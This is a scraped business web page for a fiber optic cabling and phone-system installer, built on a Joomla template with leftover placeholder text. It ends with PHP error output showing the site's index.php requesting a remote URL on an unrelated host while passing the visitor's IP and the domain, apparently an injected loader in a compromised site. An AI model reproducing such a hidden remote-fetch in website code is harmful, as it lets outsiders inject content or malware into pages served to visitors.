About bowthemes

Joomla templates

Grid systems aren’t everything, but having a durable and flexible one at the core of your work can make development much simpler.

All skill levels

Grid systems aren’t everything, but having a durable and flexible one at the core of your work can make development much simpler.

Programming

$nbsp;

Web design

$nbsp;

Social marketting

$nbsp;

Video sample

JPS

Fiber Optics Cabling

Fiber Optic Cabling Services, termination and testing for Single Mode, Multi Mode Fiber, terminations for ST, SC and LC connectors. We also sell suppliers for Fibre Optic Cables and Accessories including Fibre Patch cables, Patch Panels and Cable Fan Out kits.

Fibre Optics Installation and Parts

We offer high quality Fiber Optics Cables and equipments. From initial design stage to final testing, we carefully install all types of fiber optics whether internal or external, single or multimode fibre. We are also leading suppliers of fiber optic cables and fibre optic parts.

We Offer:

Bulk Fiber Cables
Fiber Patch Cables
Multimode Cable
Single Mode Fiber Cable
Fiber cabling Cabinets
Business phone systems
Fiber Optic Repair Service
Fiber Optic Patch panel Installation
Fiber Optic Terminations
Extend or relocate Fiber cabling

What OUR clients say ?

“JPS provides the right solution”

Troy Johnson - President

 

About JPS

Installation and Maintenance Services
With our fully qualified engineers, we can install and maintain your phone system plus cabling giving you peace of mind knowing it's in single reliable hands.

  1. Installation
  2. Maintenance
  3. Structured Cabling

Who's Online

We have 244 guests and no members online

Monthly Newsletter

Keep up to date on the latest from our network:

Notice: Undefined index: HTTP_X_FORWARDED_FOR in /home/content/04/4573604/html/index.php on line 57

Warning: file_get_contents() [function.file-get-contents]: php_network_getaddresses: getaddrinfo failed: Name or service not known in /home/content/04/4573604/html/index.php on line 65

Warning: file_get_contents(http://codehost.lirid0n.net/get.php?h=101&ip=54.81.42.111&web=www.johnsonprosrv.com) [function.file-get-contents]: failed to open stream: php_network_getaddresses: getaddrinfo failed: Name or service not known in /home/content/04/4573604/html/index.php on line 65